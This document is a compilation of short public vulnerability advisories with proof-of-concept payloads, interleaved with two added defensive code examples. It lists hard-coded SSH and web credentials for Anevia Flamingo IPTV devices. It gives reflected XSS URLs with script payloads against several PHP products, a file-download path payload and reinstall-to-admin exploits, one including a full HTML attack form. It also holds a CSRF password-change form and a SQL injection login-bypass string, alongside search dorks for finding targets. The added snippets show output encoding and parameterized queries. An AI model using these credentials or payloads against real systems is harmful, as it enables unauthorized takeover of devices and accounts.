<pre><code>Anevia Flamingo XL/XS 3.6.x Default/Hard-coded Credentials<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.6.20, 3.2.9<br /> Hardware revision 1.1, 1.0<br /> SoapLive 2.4.1, 2.0.3<br /> SoapSystem 1.3.1<br /><br />Summary: Flamingo XL, a new modular and high-density IPTV head-end<br />product for hospitality and corporate markets. Flamingo XL captures<br />live TV and radio content from satellite, cable, digital terrestrial<br />and analog sources before streaming it over IP networks to STBs, PCs<br />or other IP-connected devices. The Flamingo XL is based upon a modular<br />4U rack hardware platform that allows hospitality and corporate video<br />service providers to deliver a mix of channels from various sources<br />over internal IP networks.<br /><br />Desc: The device uses a weak set of default and hard-coded administrative<br />credentials that can be easily guessed in remote password attacks,<br />allowing an attacker to gain full control of the system.<br /><br />Tested on: GNU/Linux 3.14.29 (x86_64)<br /> Apache/2.2.22 (Debian)<br /> PHP/5.6.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5777<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php<br /><br /><br />13.04.2023<br /><br />--<br /><br /><br />SSH: root:anevia<br />SSH: enable:paris<br />WEB: admin:paris<br />WEB: monitor:anevia<br />OEM: monitor:anevia<br />OEM: monitor:teleste<br />OEM: monitor:envivio<br />OEM: monitor:blankom<br /></code></pre>
<pre><code>CraCkEr<br />THE CRACK OF ETERNAL MIGHT<br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Vulnerability ]<br /><br />Author : CraCkEr<br />Website : https://www.codester.com/items/32794/ - Pixobit Solutions<br />Vendor : OmniCart - https://omnicartshop.com/<br />Software : OmniCart 3.4.0<br />Vuln Type: Reflected XSS<br />Impact : Manipulate the content of the site<br /><br />Release Notes:<br />An attacker can send the victim a link containing a malicious URL in an email or instant message and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />Greets:<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br />© CraCkEr 2023<br /><br /><br />Path: /<br /><br />GET parameter 'lang' is vulnerable to RXSS<br /><br />https://website/?lang=ar&ms4sp"><script>alert(1)</script>ffj2=1<br /><br /><br />Path: /index.php/search<br /><br />GET parameter 'search' is vulnerable to RXSS<br /><br />https://website/index.php/search?search=123&h45te"><script>alert(1)</script>khuqf=1<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[ Vulnerability ]<br /><br />Author : CraCkEr<br />Website : https://www.codester.com/items/35390/<br />Vendor : wvidesk.com<br />Software : LearnDesk 1.0<br />Vuln Type: Reflected XSS<br />Impact : Manipulate the content of the site<br /><br />Release Notes:<br />An attacker can send the victim a link containing a malicious URL in an email or instant message and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2023<br /><br /><br />Path: /ebook-details<br /><br />GET parameter 'eBook' is vulnerable to RXSS<br /><br />https://website/ebook-details?eBook=2-20230526090815bgijo"><script>alert(1)</script>nq0d9<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[ Vulnerability ]<br /><br />Author : CraCkEr<br />Website : https://www.codester.com/items/38745/<br />Vendor : webfuelcode<br />Software : BB Machine Forum 1.0<br />Vuln Type: Reflected XSS<br />Impact : Manipulate the content of the site<br /><br />Release Notes:<br />An attacker can send the victim a link containing a malicious URL in an email or instant message and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2023<br /><br /><br />Path: /thread<br /><br />POST parameter 'thread' is vulnerable to RXSS<br /><br /><br />[+] Exploiting the Bug<br /><br />1. From Index Page Click on Create Post<br />2. Fill any Subject<br />3. Select Any Category<br />4. In Thread "Put Your XSS Payload" example v4kow<script>alert(1)</script>ebxnq<br />5. Click on Submit<br />6. XSS Fired<br />7. Copy the link of your Post and send it to the Victim example: https://website/thread/Your-POST<br />8. XSS Fired on Victim Browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>[ Vulnerability ]<br /><br />Author : CraCkEr<br />Website : https://www.codester.com/items/36326/<br />Vendor : wvidesk.com<br />Software : Expert X Jobs Portal And Resume Builder 1.0<br />Vuln Type: Reflected XSS<br />Impact : Manipulate the content of the site<br /><br />Release Notes:<br />An attacker can send the victim a link containing a malicious URL in an email or instant message and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2023<br /><br /><br />Path: /companies<br /><br />GET parameter 'listed' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvh<br /><br /><br />Path: /search-field<br /><br />GET parameter 'pos_ref' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj<br /><br /><br />Path: /search-field<br /><br />GET parameter 'frmPositionCountry' is vulnerable to RXSS<br /><br />http://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0<br /><br /><br /><br />[-] Done<br /></code></pre>
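<p>Added example, not part of the advisories above and not code from any of the affected products: a regression check for the three reflection contexts the reflected-XSS reports exercise (attribute value, HTML comment, element body), plus a query-string check that also inspects parameter names, since the OmniCart URL carries its markup in an extra parameter name rather than in the value of 'lang'. The templates and function names are constructed for illustration.</p>

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Constructed templates, one per reflection context seen in the PoC URLs above.
TEMPLATES = {
    "attribute": '<input name="pos_ref" value="{v}">',
    "comment": "<!-- listed={v} --><p>results</p>",
    "body": '<div class="thread">{v}</div>',
}


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags that survive into the parsed document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def render(context, value, encode):
    """Reflect `value` into the chosen template, optionally HTML-encoding it."""
    if encode:
        # quote=True also encodes " and ', which the attribute breakout needs.
        value = html.escape(value, quote=True)
    return TEMPLATES[context].format(v=value)


def injects_script(page):
    """True if the rendered page contains a live <script> element."""
    counter = _ScriptCounter()
    counter.feed(page)
    counter.close()
    return counter.scripts > 0


def markup_in_query(url):
    """Return (part, text) for each query name or value carrying markup characters.

    Names are checked as well as values: a filter that only validates the
    value of a known parameter never sees markup placed in a parameter name.
    """
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for part, text in (("name", name), ("value", value)):
            if any(ch in text for ch in '<>"'):
                hits.append((part, text))
    return hits
```

<p>Encoding at output time closes all three contexts because the breakout sequences depend on a literal <code>"</code> or <code>&gt;</code> reaching the page; the query check is a logging or test aid, not a substitute for that encoding.</p>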
<pre><code>===========================================================================================<br />| # Title : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) |<br />| # Vendor : https://photoswipe.com/ |<br />| # Dork : |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : download?path=/uploads/images/support/download/index.php<br /><br />[+] Payload enables you to download empty files.<br /><br />[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip |<br />| # Dork : |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4<br /><br />[+] Set new user or password.<br /><br />[+] Admin panel : http://zarabiara.pl/admin-panel/index.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KesionCMS X9.5 Reinstall Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |<br />| # Vendor : https://www.kesion.com/ |<br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /install/index.asp<br /><br />[+] http://127.0.0.1/install/?action=s4 = add your information to login<br /><br />[+] Copy and paste the exploit listed below into a text file and save it with ".html" extension<br /><br />[+] Exploit :<br /><br />[+] At lines 09 and 16, change the domain name of the target<br /><br /> <head><title><br /> Hacked By indoushka<br /> </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /><br /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script><br /> </head><br /> <body> <br /> <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form"><br /> <div class="guide"><br /> <div class="guidetitle"><br /> </div><br /> <div class="clear"></div><br /> </div><br /> <div class="clear"></div><br /> <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5" /><br /> <input type="hidden" name="DBlx" value="" /><br /> <input type="hidden" name="CkbData" value="" /><br /> <br /> <input type="hidden" name="TxtDBName_a" value="" /><br /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /><br /> 
<input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /><br /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /><br /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /><br /> <br /><div id="http://www.tzxdcpv.com/install/?action=s4"><br /> <br /> <br /><br /> </div><br /> <div class="clear"></div><br /> <div class="sjlist"><br /> <h5>网站参数配置</h5><br /> <ul><br /> <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li><br /> <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 如http://www.kesion.com。<br /> </li><br /> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 系统会自动获取,建议不要修改。<br /> </li><br /> <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"><br /> 免费版本用户请留空或填“0”。<br /> </li><br /> <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li><br /> <li><span> 后台登录验证码:</span><br /> <input type="radio" name="isCode_a" value="True" /> 启用 <br /> <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用<br /> </li><br /> <br /> <li><span>管理认证码:</span><br /> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <br /> <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li><br /> </ul><br /> <div class="clear"></div><br /> <h5>填写管理员信息</h5><br /> <ul><br /> <li><span>管理员账号:</span><input name="TxtUserName" 
value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li><br /> <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li><br /> <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li><br /> </ul><br /> <div class="clear blank10"></div><br /> <br /> <div style="padding:5px"><br /> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"><br /> </div><br /> </div><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Pannresidence CMS 7.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189 |<br />| # Dork : "Bylancer, All right reserved" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The following HTML will modify the password for the site manager, as well as change the e-mail.<br /><br />[+] Save the code as poc.html.<br /><br /><br /><br /><form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2"><br /><br /> <fieldset><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="password" id="password" class="form-control" placeholder="Your new password." type="password"><br /> </div><br /> </div><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." 
type="password" onchange="check_pass()"><br /><br /> </div><br /> </div><br /> <br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="newEmail" value="" class="form-control" type="email"><br /><br /> </div><br /> </div><br /> <br /> </fieldset><br /><br /> <div class=""><br /> <div class="row"><br /> <div class="col-md-12"><br /> <button class="btn btn-default" type="clear"><br /> Cancel<br /> </button><br /><br /> <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit"><br /> <i class="fa fa-save"></i><br /> Submit<br /> </button><br /> </div><br /> </div><br /> </div><br /><br /> </form><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ormesson-immobilier cms v8 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |<br />| # Vendor : https://www.easysolutions.lu/ |<br />| # Dork : powered by Sogis.be © |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : user & Pass : 1' or 1=1 -- -<br /><br />[+] http://127.0.0.1/ormesson/MyGestion/#/<br /></code></pre>
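<p>Added example, not part of the advisory and not code from the affected CMS: why the user/pass value quoted above passes a login check built by string concatenation, next to a form that binds the username as a parameter and verifies the password outside the SQL statement. The schema, the account, the salt and the function names are constructed for illustration; the real application's query is not shown on this page.</p>

```python
import hashlib
import hmac
import sqlite3

# Constructed constant: one salt keeps the example short; real systems
# store a separate random salt per user.
SALT = b"constructed-demo-salt"
# The user/pass value quoted in the advisory above.
PAYLOAD = "1' or 1=1 -- -"


def digest(password):
    """Password verifier stored in the constructed users table."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db():
    """In-memory database with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        ("admin", digest("S3cure-constructed-pw")),
    )
    return conn


def login_vulnerable(conn, username, password):
    """Before: the username is pasted into the SQL text.

    With PAYLOAD the statement becomes
        ... WHERE username = '1' or 1=1 -- -' AND pw_hash = '...'
    so the password condition is commented out and every row matches.
    """
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND pw_hash = '" + digest(password) + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    """After: the username is a bound parameter, so it is only ever data.

    The password is compared in application code with a constant-time
    comparison instead of inside the WHERE clause.
    """
    row = conn.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], digest(password))
```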